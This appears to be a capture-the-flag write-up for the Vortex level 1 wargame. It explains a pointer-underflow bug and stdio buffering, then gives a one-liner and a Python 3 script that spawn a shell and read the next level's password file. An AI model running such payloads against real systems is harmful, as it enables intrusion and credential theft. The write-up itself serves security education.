This one is still a warming-up level. Rebuild the binary with a few extra printf statements, just to gather information about the memory layout (the casts are needed because %x expects an unsigned int, not a pointer):

...
printf("begin address of buf:\t%x\n", (unsigned int)buf);
printf("end address of buf:\t%x\n", (unsigned int)buf + sizeof(buf));
printf("address of ptr:\t\t%x\n", (unsigned int)&ptr);
...
As you can see:

begin address of buf:   bffff490
end address of buf:     bffff690
address of ptr:         bffff48c
ptr is stored 4 bytes below the buffer, so we must "underflow" the buffer rather than overflow it. If you check the code carefully, you can see that every "\\" moves ptr back by one byte. 0x101 of them take it from its starting position (buf+0x100, given the numbers above) to buf-1 = bffff48f, which on little-endian x86 is the most significant byte of ptr "itself". Writing "\xca" there sets the top byte of ptr to 0xca, and the next character (any character except "\n" and "\\", which take the other switch cases) triggers the shell execution:
python -c 'print "\\"*0x101+"\xcaX"' | /vortex/level1
sh-3.2$ exit
A shell is spawned, but it exits immediately. Adding commands right after the trigger character did nothing either. The reason is stdio buffering: level1 reads its input with getchar(), which pulls a whole block of the pipe (4 KiB here) into a user-space buffer, and everything in that buffer is discarded when the process image is replaced by sh. The shell only sees whatever is still unread in the pipe, which by then is nothing. So if we push the commands past the first 4 KiB with a huge junk string, the shell reads them and we succeed:
python -c 'print "\\"*0x101+"\xca!\n"+"A"*4000+"\nwhoami\ncat /etc/vortex_pass/vortex2"' | /vortex/level1
sh-3.2$ sh: AAAAAAA [...] AAAAAAA: command not found
sh-3.2$ vortex2
sh-3.2$ ********
sh-3.2$ exit
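The same payload, built by a small Python 3 script instead of a one-liner, so the two ingredients (the underflow that clobbers ptr's top byte and the padding that carries the commands past the stdio buffer) are computed rather than guessed. This is an added example, not code from the original post; it assumes the layout derived above (buf is 0x200 bytes, ptr starts at buf+0x100 and sits 4 bytes below buf) and a 4096-byte stdio read buffer. The function and constant names are my own.

```python
#!/usr/bin/env python3
"""Build the stdin payload for /vortex/level1: underflow buf to rewrite the
top byte of ptr, fire the trigger, then pad so the commands survive the
stdio buffer that is thrown away when sh replaces the process."""
import sys

# Layout from the debugging printfs: buf is 0x200 bytes and ptr lives 4 bytes
# below it (bffff48c vs bffff490), so its most significant byte is at buf - 1.
BUF_SIZE = 0x200
PTR_START_OFFSET = BUF_SIZE // 2   # derived: 0x101 backslashes reach buf-1
TRIGGER_BYTE = 0xCA                # top byte of ptr the level checks for
STDIO_BUF = 4096                   # assumed stdio read buffer filled by getchar()


def backslashes_needed(ptr_start_offset: int = PTR_START_OFFSET) -> int:
    """Number of '\\' bytes that walk ptr from buf+ptr_start_offset to buf-1."""
    return ptr_start_offset + 1


def build_payload(commands: bytes, padding_byte: bytes = b"A",
                  stdio_buf: int = STDIO_BUF) -> bytes:
    """Return the bytes to pipe into /vortex/level1.

    The prefix underflows the buffer and fires the trigger. Everything after
    it is for the spawned shell, so it is pushed past the first stdio read.
    """
    trigger = b"\\" * backslashes_needed()   # ptr -> buf-1 (its own MSB)
    trigger += bytes([TRIGGER_BYTE])          # *ptr = 0xca, ptr now 0xca......
    trigger += b"!"                           # any byte but '\n' / '\\' runs e()
    # level1 has already slurped up to stdio_buf bytes into its stdio buffer
    # when sh takes over, and that data is lost. Pad with junk so the real
    # commands start beyond that window; sh reports the junk as an unknown
    # command and carries on.
    pad_len = max(0, stdio_buf - len(trigger)) + 1
    padding = padding_byte * pad_len + b"\n"
    return trigger + padding + commands


if __name__ == "__main__":
    cmds = b"whoami\ncat /etc/vortex_pass/vortex2\n"
    sys.stdout.buffer.write(build_payload(cmds))
```

Usage: python3 payload.py | /vortex/level1. If a different kernel or libc uses a larger stdio buffer the padding simply needs to grow; anything that starts after the first buffered read reaches the shell.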